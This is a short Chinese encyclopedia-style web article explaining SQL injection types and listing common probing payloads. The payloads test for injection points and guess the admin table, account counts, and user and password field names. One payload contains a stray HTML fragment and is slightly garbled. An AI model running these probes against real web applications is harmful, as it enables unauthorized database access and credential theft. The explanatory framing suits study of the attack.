最新文章專題視頻專題問答1問答10問答100問答1000問答2000關(guān)鍵字專題1關(guān)鍵字專題50關(guān)鍵字專題500關(guān)鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關(guān)鍵字專題關(guān)鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
當(dāng)前位置: 首頁 - 科技 - 知識(shí)百科 - 正文

sql注入語句

來源:懂視網(wǎng) 責(zé)編:臨意 時(shí)間:2021-12-29 16:44:54
文檔

sql注入語句

sql注入語句其實(shí)可以分為三種的,即數(shù)字型注入點(diǎn),語句一般是“select*from表名where id=1and1=1”;字符型注入點(diǎn),語句一般是“select*from表名where name...”;搜索型注入點(diǎn)。
推薦度:
導(dǎo)讀sql注入語句其實(shí)可以分為三種的,即數(shù)字型注入點(diǎn),語句一般是“select*from表名where id=1and1=1”;字符型注入點(diǎn),語句一般是“select*from表名where name...”;搜索型注入點(diǎn)。

sql注入語句是怎樣的呢?下面就讓我們一起來了解一下吧:

sql注入語句其實(shí)可以分為三種的,即數(shù)字型注入點(diǎn),語句一般是“select * from表名where id=1 and 1=1”;字符型注入點(diǎn),語句一般是“select * from表名where name...”;搜索型注入點(diǎn)。

而sql注入也就是通過將SQL命令插入到Web表單提交或是輸入域名、頁面請(qǐng)求的查詢字符串,最終可以達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。

sql注入類型通常是可以按照不同方式進(jìn)行分類的,比如若是按照注入點(diǎn)類型來進(jìn)行分類可以分為數(shù)字型注入點(diǎn)、字符型注入點(diǎn)、搜索型注入點(diǎn),若是按照數(shù)據(jù)提交的方式來分類,可以分為GET 注入、POST 注入、Cookie 注入、HTTP 頭部注入。

當(dāng)然也可以按照?qǐng)?zhí)行效果來分類,可以分為基于布爾的盲注、基于時(shí)間的盲注、基于報(bào)錯(cuò)注入、聯(lián)合查詢注入。

其中常用的語句有:

1、判斷有無注入點(diǎn)

; and 1=1 and 1=2

2、猜表 通常表的名稱基本上是admin adminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判斷是否存在admin這張表

3、猜帳號(hào)數(shù)目 若是遇到0< 返回正確頁面 1<返回錯(cuò)誤頁面那么就說明帳號(hào)數(shù)目就是1個(gè)

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4、猜解字段名稱 在len()括號(hào)里面可以加上所想到的字段名稱。

and 1=(select count(*) from admin where len(*)>0)--

and 1=(select count(*) from admin where len(用戶字段名稱name)>0)

and 1=(select count(*) from admin where len(_blank>密碼字段名稱password)>0)

以上就是小編的分享了,希望能夠幫助到大家。

聲明:本網(wǎng)頁內(nèi)容旨在傳播知識(shí),若有侵權(quán)等問題請(qǐng)及時(shí)與本網(wǎng)聯(lián)系,我們將在第一時(shí)間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文檔

sql注入語句

sql注入語句其實(shí)可以分為三種的,即數(shù)字型注入點(diǎn),語句一般是“select*from表名where id=1and1=1”;字符型注入點(diǎn),語句一般是“select*from表名where name...”;搜索型注入點(diǎn)。
推薦度:
標(biāo)簽: sql 注入語句
  • 熱門焦點(diǎn)

最新推薦

猜你喜歡

熱門推薦

專題
Top